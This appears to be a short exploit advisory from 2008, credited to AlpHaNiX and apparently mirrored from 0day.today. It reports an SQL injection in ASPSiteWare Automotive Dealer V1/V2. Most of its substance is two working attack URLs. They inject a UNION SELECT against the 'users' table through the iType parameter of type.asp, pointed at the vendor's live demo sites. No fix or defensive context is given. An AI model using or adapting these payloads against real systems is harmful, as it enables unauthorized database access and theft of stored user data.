id: 4453
date: 12/14/2008
title: ASPSiteWare Automotive Dealer V1/V2 SQL Injection Vulnerability
author: AlpHaNiX
cves: 

===============================================================
ASPSiteWare Automotive Dealer V1/V2 SQL Injection Vulnerability
===============================================================


###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX

###########################################################################

#script   : Automotive Dealer V1/V2
#download : null
#Demo     :  http://www.aspsiteware.com/Auto1/
	     http://www.aspsiteware.com/auto2/auto2/


###########################################################################

#Exploits :

--=[SQL INJECTION]=--
http://www.aspsiteware.com/Auto1/type.asp?iType=4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+users#
http://www.aspsiteware.com/auto2/auto2/type.asp?iType=4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+users#

###########################################################################



#  0day.today [2023-03-25]  #